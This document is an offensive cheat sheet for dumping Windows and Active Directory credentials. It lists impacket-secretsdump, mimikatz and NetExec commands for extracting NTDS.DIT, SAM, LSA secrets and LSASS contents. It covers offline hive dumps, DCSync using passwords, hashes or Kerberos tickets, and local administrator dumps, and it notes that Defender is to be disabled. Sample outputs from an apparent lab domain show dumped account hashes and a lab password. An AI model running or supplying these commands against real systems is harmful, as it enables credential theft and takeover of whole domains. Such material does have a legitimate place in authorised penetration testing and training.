Secrets Dump


Authentication Method

Convert NTDS.DIT to .sqlite

ntdsdotsqlite ntds.dit --system SYSTEM -o ntds.sqlite

Ref: ntdsdotsqlite


With NTDS.DIT and SYSTEM Hive

impacket-secretsdump -ntds ntds.dit -system system LOCAL
Sample Output:
$ impacket-secretsdump -ntds ntds.dit -system system LOCAL
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
---[SNIP]---
[*] Cleaning up...


With SAM, SYSTEM and SECURITY Hives

impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SECURITY SECURITY
reg save HKLM\SAM SAM
.\mimikatz.exe "lsadump::secrets /system:SYSTEM /security:SECURITY"
.\mimikatz.exe "lsadump::sam /system:SYSTEM /sam:SAM"
execute "powershell" "reg save HKLM\SYSTEM C:\SYSTEM"
execute "powershell" "reg save HKLM\SECURITY C:\SECURITY"
execute "powershell" "reg save HKLM\SAM C:\SAM"
mimikatz -- '"lsadump::secrets /system:C:\SYSTEM /security:C:\SECURITY"'
mimikatz -- '"lsadump::sam /system:C:\SYSTEM /sam:C:\SAM"'


With DCSync Right

# Password
impacket-secretsdump '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'
Sample Output:
$ impacket-secretsdump 'sequel.htb/ryan.cooper:NuclearMosquito3@dc.sequel.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
---[SNIP]---

# NTLM
impacket-secretsdump '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH>
Sample Output:
$ impacket-secretsdump 'sequel.htb/ryan.cooper@dc.sequel.htb' -hashes :98981eed8e9ce0763bb3c5b3c7ed5945
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
---[SNIP]---

# Password-based Kerberos
impacket-secretsdump '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k
Sample Output:
$ impacket-secretsdump 'sequel.htb/ryan.cooper:NuclearMosquito3@dc.sequel.htb' -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] CCache file is not found. Skipping...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
---[SNIP]---

# NTLM-based Kerberos
impacket-secretsdump '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH> -k
Sample Output:
$ impacket-secretsdump 'sequel.htb/ryan.cooper@dc.sequel.htb' -hashes :98981eed8e9ce0763bb3c5b3c7ed5945 -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] CCache file is not found. Skipping...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
---[SNIP]---

# Ticket-based Kerberos
impacket-secretsdump '<DOMAIN>/<USER>@<TARGET>' -k -no-pass
Sample Output:
$ impacket-secretsdump 'sequel.htb/ryan.cooper@dc.sequel.htb' -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
---[SNIP]---

# Password
nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --ntds
# NTLM
nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -H '<HASH>' --ntds
# Password-based Kerberos
nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --kdcHost <DC> --ntds
# NTLM-based Kerberos
nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -H '<HASH>' -k --kdcHost <DC> --ntds
# Ticket-based Kerberos
nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -k --kdcHost <DC> --use-kcache --ntds
.\mimikatz.exe "lsadump::dcsync /all" "exit"
# Dump old creds
.\mimikatz.exe "lsadump::dcsync /user:<DOMAIN>\<USER> /history" "exit"
mimikatz -- '"lsadump::dcsync /all"' "exit"


With SYSTEM / Administrator / LAPS

# Password
impacket-secretsdump '<USER>:<PASSWORD>@<TARGET>'
# NTLM
impacket-secretsdump '<USER>@<TARGET>' -hashes :<HASH>
# Password
nxc smb <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M lsassy
# NTLM
nxc smb <TARGET> -u '<USER>' -H <HASH> --local-auth -M lsassy

Note: Disable Defender

.\mimikatz.exe "sekurlsa::logonpasswords"
.\mimikatz.exe "lsadump::lsa /patch"
mimikatz -- '"sekurlsa::logonpasswords"'
mimikatz -- '"lsadump::lsa /patch"'